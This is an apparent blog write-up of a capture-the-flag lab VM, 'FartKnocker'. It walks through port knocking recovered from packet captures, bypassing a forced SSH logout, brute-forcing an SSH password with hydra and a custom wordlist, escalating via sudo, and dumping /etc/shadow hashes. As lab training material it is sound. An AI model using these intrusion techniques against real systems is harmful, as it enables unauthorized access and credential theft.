published on in writeup
tags: tophatsec

TopHatSec: FartKnocker

This VM has a focus on port knocking, the clues for which are buried in packet captures.

Discovery

[email protected]:~# nmap -n -p- -A 192.168.56.103

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).

Knock Once

The webpage on port 80 contains a simple HTML file, with a link to the first packet capture.

<html>
<a href="pcap1.pcap">Wooah</a>
</html>

So let’s download this and have a look in Wireshark. There are 2 main sections separated by ICMP request/replies.

The first sequence of packets are SYN packets to ports 7000, 8000 and 9000. The second sequence are more SYN packets to ports 7000, 8000, 9000 and 8888. Knocking these ports opens ports 8888.

[email protected]:~# knock -v 192.168.56.103 7000 8000 9000 7000 8000 9000 8888; nc 192.168.56.103 8888
hitting tcp 192.168.56.103:7000
hitting tcp 192.168.56.103:8000
hitting tcp 192.168.56.103:9000
hitting tcp 192.168.56.103:7000
hitting tcp 192.168.56.103:8000
hitting tcp 192.168.56.103:9000
hitting tcp 192.168.56.103:8888
/burgerworld/

Knock Twice

[email protected]:~# curl 192.168.56.103/burgerworld/
<html>
<a href="pcap2.pcap">heheh...hehh..</a>
</html>
[email protected]:~# wget 192.168.56.103/burgerworld/pcap2.pcap
[email protected]:~# wireshark pcap2.pcap 

There are quite a few more packets this time, so I made the review a bit easier by putting a source IP filter in place.

This time we have a SYN on port 21, UDP packet on port 22, SYN on 80 and a SYN on 8080.

[email protected]:~# knock -v 192.168.56.103 21 22:udp 80 8080; nc 192.168.56.103 8080
hitting tcp 192.168.56.103:21
hitting udp 192.168.56.103:22
hitting tcp 192.168.56.103:80
hitting tcp 192.168.56.103:8080
(UNKNOWN) [192.168.56.103] 8080 (http-alt) : Connection refused
[email protected]:~# knock -v 192.168.56.103 21 22:udp 80 8080; nc 192.168.56.103 8080
hitting tcp 192.168.56.103:21
hitting udp 192.168.56.103:22
hitting tcp 192.168.56.103:80
hitting tcp 192.168.56.103:8080

                      MMMMMMM           MMMMMMH 
                HMMMMM:::::::.MMMMMMMMMM:::::.TMM
              MMMI:::::::::::::::::::MMH::::::::TM
            MMIi::::::::::::.:::::::::::::::::::::MMMM
           MT::::.::::::::::::::::::::::::::::::.::=T.IMMM
         MMMi:::::::::::::::::::::::::::::::::::::::::::MT)MM
     MMMI.:::::::::::::::::::::::::::::::::::::::::::.:::M= MM
   XMXi::::::::::::::::::::::.:::::::::::::::::::::::::::::::=MM
   MMi::::::::::::::::::::::::::::::::::::::::::::::::::.::..:=MMM
  MM:MMT:::::::::.:::::::::::::::::.:::::::::::::::::::::::::::MiMM
   MMM::::::::::::::::::.::::::::::::::::::::::::::.::::::::::.TM.MM
   MMi::::::::::::::.::::::::::::::::::::::::::::::::::::::.:::.:: M
   MM:::.::::::::::::::::::::::::::::::::.:.:::::::::::::::::::::: XM
 MM:MT::.::::::::::::::::::::::::::::::::::::::::::::::::::::::::::XM
IMM:::.::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::.=M
 MM::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :::M
 XMT:::::::::::::::::::::: ::::::::::::::::: : ::::::::::::::::::: iM
   MiMi:::::::::: :::::::::::::::::::::::::::::::: ::::::::::::::.:IM
     M::::::HH::::::::::::::::::::::::::::::::::::::::::::::::::::: M
     MT:::::iM::::::::Hi:iXH:::ii::XH:::::::::::::.::::::::::::::.:.M
      MX:::::iMX:i::::iMi:iMH::XH::Mi:::::::::::::::::::::::::::::: M
        Mii::::HMH:::::iMH::MH=:MM=TMi::::::::::::::::::::::::::::::MM
          MMMMMMMMMMMXTi:MMHi:HMMIMMMMii::::::::::::::::::::::::::::XM
           XXOXMMT:. ::T= :IMMMMMMM=iXMii:::::::::::::::::::::::::: MM
            MMMH:::.:::::::.::::.::::.:XMi::::::::::::::::::::::::::MM
           XMM::.:.:..::..:.:.::.:.::: ::XMi::::::::::::::::::::::::MX
          XMMT::::.:.::.::::.::.::::::::.::XH:::::::::::::::::::::: M
          HMX::...:..::..:.:.::::::..... :::XX::::::::::::::.:::::. M
          MM:::....:::::.::::::..:::::.:..:::HX::::::::::::::::::::=M
          MX::::::::::::::::::::::..::::.:..::X::::::::::::::::::::IM
         XMI..  .:.::....:..::::.:: ::...::.:.MH:::::::::::::::::.: M
         MM:. ::..::....::.::::::....:.:...:..MT::.   ::::::::: :..IM
         MM=:::::.::.:::::..::::.: .::..::..::Mi:::::::::::::::::: MM
         MMI:::...:  .::..::::::.:::::::.::::TM:::::::::::::::::::=MO
          MH.: .::::.::.. .:::::iLMXX=::::.:.Mi::::::: ::::::::::.MM
          MX:.:..:: .:.:.:.: :MMM:::..:::::.HM:::: :::::::::::::.MM
          MM:::...::....: ::IMT:::.:...:.::.MT::::::: ::::::::: MM
           M=::..::::..:::MM:i:..::.:...: ::M:::: ::: ::::::::::MI
           MH::: :.:.: MMMM=:::.:.:...:....iM::: ::::::  ::::::LM
          MMMMT.::. ::TM:::::..::::::::.::.IM::::HH:::::::::::.MO
           MM:LM::T:MT.:: .......:....:.:: TMMiXMT.MH:::.::::.:M=
            M:. :::MMi:::MMMM=::::::.::..::=MMMMMMXMH:::.:::::MM
           XMI: :..::=MX  :M::.......:...:::.MXTHM MH:::.: :.XM
           MM XMMI IM    M   ................:: :MIIM:::::::MMO
            MMXXMILM  .ML.= :.:::....:.:..::.:..:::MMT:::::TMM
              MXMLMMMT::.:...:........ ....::.:.=.MMMM:::::MM
              MHM=:: :.:::...::::.:...:.....:: =MMM==Mi::::M
              MM=:::.......:.:.::.:.::...:.: ::  . ::=M:: MM
             MMi:=XMMMi::::...:::::.::.:::::::::..: ::Mi:=MT
            MM=:I::  :iMH==:::::.::.:::::::::::::::.::MT:XMT
           MT=:=MMMMMMM=HM::::.::::::MMT=Mi::::::..:::MI=MM
          M ::::::.=I= .MX:..: ::::.::MX::::.:::.:.  .XMMM
         M:MMMMMMM=.::::  ::.::...:.MMIM::.:::.::..::::M
                 M=:: : ::::.==XMMM:XMMM=:::.::.:.::::.M
                 M=.IMMM )X   M  MMMMMM=:::..::..:::.::M
                 MM  X  MMM:MMMMMMMMM=:::.:.:.. .:.::::M
                  MIMMMMMMMMMMMMMMI::::::::.:::.:...:.:M
                MMMMMMMMMMMMMX:.   .:..::....:...:::.:iM
               MMMMMMMMMMI::::::.:.::...:....:.....:.:=M
           MMMMMMMMMI:::::.:.. :.::.::..........:..:..:M
            M=:  :..::..::.........::.......::.:.....: M
             MMMi::::::.:.:==MMMMMMMMMT:.:.:::..:::..: OM
               MM=::..: OMMMM         MMMT:::....:.::: :M
                M=::::MM                MMI:::........:OM
                 MMMMM                   MMH:::..::MMMMMM
                                          MMMMMMMMMMMMMMM


                     CAN YOU UNDERSTAND MY MESSAGE?!



        eins drei drei sieben

Knock Thrice

eins drei drei sieben is German for one three three seven1337, get it ;)

[email protected]:~# knock -v 192.168.56.103 1 3 3 7; nc 192.168.56.103 1337
hitting tcp 192.168.56.103:1
hitting tcp 192.168.56.103:3
hitting tcp 192.168.56.103:3
hitting tcp 192.168.56.103:7
(UNKNOWN) [192.168.56.103] 1337 (?) : Connection refused
[email protected]:~# knock -v 192.168.56.103 1 3 3 7; nc 192.168.56.103 1337
hitting tcp 192.168.56.103:1
hitting tcp 192.168.56.103:3
hitting tcp 192.168.56.103:3
hitting tcp 192.168.56.103:7
/iamcornholio/
[email protected]:~# curl 192.168.56.103/iamcornholio/
<html>
T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK
</html>

This is a base64 encoded string.

[email protected]:~# echo -en "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" | base64 -d
Open up SSH: 8888 9999 7777 6666

Knock Four-ice?

[email protected]:~# knock -v 192.168.56.103 8888 9999 7777 6666; ssh 192.168.56.103
hitting tcp 192.168.56.103:8888
hitting tcp 192.168.56.103:9999
hitting tcp 192.168.56.103:7777
hitting tcp 192.168.56.103:6666
ssh: connect to host 192.168.56.103 port 22: Connection refused
[email protected]:~# knock -v 192.168.56.103 8888 9999 7777 6666; ssh 192.168.56.103
hitting tcp 192.168.56.103:8888
hitting tcp 192.168.56.103:9999
hitting tcp 192.168.56.103:7777
hitting tcp 192.168.56.103:6666
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #
############################################
[email protected]'s password: 

SSH

It was very nice of it to give us the credentials for butthead, but we get kicked off straight away.

[email protected]:~# ssh [email protected]
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #
############################################
[email protected]'s password: 
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)

 * Documentation:  https://help.ubuntu.com/
Last login: Wed Apr  8 16:30:47 2015 from 192.168.56.101
You are only logging in for a split second! What do you do!
Connection to 192.168.56.103 closed.

We can get around this by simply placing a shell command to run at the end of the line, e.g:

[email protected]:~# ssh [email protected] id
[email protected]'s password: 
uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)

Of course, invoking /bin/bash saves a lot of tediousness.

[email protected]:~# ssh [email protected] /bin/bash
[email protected]'s password: 

id
uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)
whoami
butthead

ls -l
total 4
-rw-rw-r-- 1 butthead butthead 67 Mar  3 00:33 nachos

cat nachos
Great job on getting this far.

Can you login as beavis or root ?

Getting Beavis!

This portion of the VM took me something like 6 hours! Getting beavis’ password was a complete pain >:D

I figured that the password would be Beavis and Butthead related. So I used cEWL to pull words from various sources such as Wikipedia and IMDB quote pages. I ran the wordlist through hydra but no valid login was found :(

The final trick was to a) remove all spaces; b) convert all characters to lowercase.

Eventually…

[email protected]:~# hydra -l beavis -P wordlist -f -t 32 192.168.56.103 ssh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

[22][ssh] host: 192.168.56.103   login: beavis   password: mikejudge
[STATUS] attack finished for 192.168.56.103 (valid pair found)
[email protected]:~# ssh [email protected]

[email protected]:~$ id; whoami
uid=1000(beavis) gid=1000(beavis) groups=1000(beavis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
beavis

Root

Beavis is a member of the sudo group, making the escalation a trivial exercise.

[email protected]:~$ sudo -l
[sudo] password for beavis: 
Matching Defaults entries for beavis on Huhuhhhhhuhuhhh:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User beavis may run the following commands on Huhuhhhhhuhuhhh:
    (ALL : ALL) ALL
[email protected]:~$ sudo -i

[email protected]:~# cat /etc/shadow
root:$6$iKFfVKIm$TChaO1huLt0YVVUKdQ./4/nPKa7hL96JRDUk0qzBt0Hl9MeYCzZD5cS9qaxxbzif78mX8XiO2seiukv0vPL48/:16497:0:99999:7:::
beavis:$6$vL7Sn7xS$vmqKbPx1nahNiF8YmITZqgXhv89G/aMQSMJOfN5meoOQtcsIAxrlTyC/pUHwoDkWkkq2Umr7HawkiLrnYFqI11:16496:0:99999:7:::
butthead:$6$wl1mxaMt$ginoPx9IAhi6WnJzrhH0bUDDhQVhLPWOvYAaT9Tf2hgauBiOxbNNY8WZMSSg1n0XEkvSoGKvV8EtibKg0AP1Y.:16497:0:99999:7::